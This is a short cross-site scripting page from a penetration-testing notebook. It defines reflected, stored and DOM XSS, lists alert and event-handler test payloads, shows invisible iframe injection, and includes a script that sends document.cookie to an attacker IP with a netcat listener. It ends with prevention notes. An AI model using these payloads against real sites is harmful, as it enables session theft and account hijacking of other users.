🖌️
CyberBook
  • CyberBook
  • Shells
  • SNMP
  • Web
    • [XSS] Cross Site Scripting
  • Databases
  • Pivoting and Tunneling
  • Metasploit
  • File transfer
  • HTTP
  • Loot
  • SSH
  • NFS & RPC
Powered by GitBook
On this page
  • Exploitation with Beef
  • With event handlers
  • How to prevent XSS

Was this helpful?

  1. Web

[XSS] Cross Site Scripting

PreviousWebNextDatabases

Last updated 5 years ago

Was this helpful?

Links )

YouTube

XSS vulnerabilities are caused due to unsanitized user input that is then displayed on a web page in HTML format. These vulnerabilities allow malicious attackers to inject client side scripts, such as JavaScript, into web pages viewed by other users.

Although XSS attacks don't directly compromise a machine, these attacks can still have significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more."

**Only JavaScript or VbScript embedded in auth.y.com can read cookies belonging to auth.y.com**

reflected = non persistence, echoed back immediately. In the HTTP request!
stored = persistence, stored in web application
DOM XSS = lives within the DOM environment, a page's client-side script itself and soes not reach server-side code

Camouflage URL

  • tinyurl

  • iframes

  • link in a targeted email

<plaintext> tag/payload for testing

alert('abc');alert(document.cookie)

string.fromCharCode(xxx, xxx, xxx)

Payload example

<script>
x = '<!--<script>' < /script>/ - alert(1)
</script>

PHP code injection

<?
echo '<h4>Hello ' . $_GET['name'] . '</h4>';
?>

Browser Redirection and IFRAME Injection

.<iframe SRC="http://$ip/report" height = "0" width ="0"></iframe>
invisible iframe
.<iframe src="http://<me>:<myport>/something" height="0" width="0"></iframe>

Stealing Cookies and Session Information

.<iframe src="http://10.11.0.5/report" height = "0" width = "0"></iframe>
.<script> new Image().src="http:10.11.0.126/bogus.php?output="+document.cookie; </script>

nc -nlvp 80

<img src="logo.png" alt="<?= $_GET['name'] ?>">

Exploitation with Beef

Put the hook link in the web page by XSS

With event handlers

abc" onmouseover=alert("XSS") "
onclick, onload, onerror etc

<a onmouseover="alert('xss')">xss link</a>
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=/ onerror="alert('xss')"></img>

How to prevent XSS

  • Encoding: < becomes &lt;

  • Filtering: becomes script

  • Validating: compare input against white list

  • Sanitization: combination of escaping, filtering and validation

https://portswigger.net/web-security/cross-site-scripting
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MoYN8LF4vsGNtgwmLinMnW3
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=60
https://www.youtube.com/watch?v=I0SusAlT1wY&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=63
https://www.youtube.com/watch?v=gU_zv8HIG2g&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=177
https://www.youtube.com/watch?v=t-44ZsaeIQE&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=199